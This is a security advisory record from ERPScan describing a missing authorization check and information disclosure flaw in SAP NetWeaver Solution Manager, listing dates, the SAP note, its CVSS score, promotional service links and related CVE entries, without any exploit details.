SAP NetWeaver Solution Manager - Missing Authorization Check & Information Disclosure
2011-07-12T00:00:00
ID: ERPSCAN-14-004
Type: erpscan
Reporter: ERPScan
Modified: 2011-07-12T00:00:00

Application: SAP NetWeaver Solution Manager
Versions Affected: SAP NetWeaver Solution Manager
Vendor URL: http://www.sap.com
Bugs: Missing Authorization Check & Information Disclosure
Reported: 07.12.2011
Vendor response: 08.12.2011
Date of Public Advisory: 25.01.2014
Reference: SAP Security Note 1828885 (https://service.sap.com/sap/support/notes/1828885)
CVSS: AV:N/AC:L/AU:N/C:P/I:N/A:N 5.0
Author: Evgeny Neyolov (ERPScan)
Description
SAP NetWeaver Solution Manager is vulnerable to information disclosure through missing authorization check.
Business Risk
An attacker can use an information disclosure vulnerability to reveal additional information (system data, debugging information, etc.) that helps them learn more about the system and plan further attacks.
Defense
To prevent this issue as well as a plethora of other vulnerabilities that may affect your systems, ERPScan provides the following services:

 * SAP Vulnerability Assessment (http://erpscan.com/services-2/sap-vulnerability-assessment/)
 * SAP Security Assessment (http://erpscan.com/services-2/sap-security-assessment/)
 * SAP Security Trainings (http://erpscan.com/services-2/sap-security-trainings/)
 * SAP Custom code security review (http://erpscan.com/services-2/sap-custom-code-security-review/)
 * SAP Penetration testing (http://erpscan.com/services-2/sap-penetration-testing/)
Related records
 * CVE-2014-1960 (NVD, published 2014-02-14): The Solution Manager in SAP NetWeaver does not properly restrict access, which allows remote attackers to obtain sensitive information via unspecified vectors. CWE-264; CVSS 2.0 AV:N/AC:L/Au:N/C:P/I:N/A:N, score 5.0; affected CPEs: sap:netweaver_solution_manager 7.0 and 7.1, sap:netweaver. https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1960
 * ERPSCAN-18-004: RCE via path Traversal using CSRF in SAP CRM (SAP Security Note 2547431). https://erpscan.io/advisories/erpscan-18-004-rce-via-path-traversal-using-csrf-sap-crm/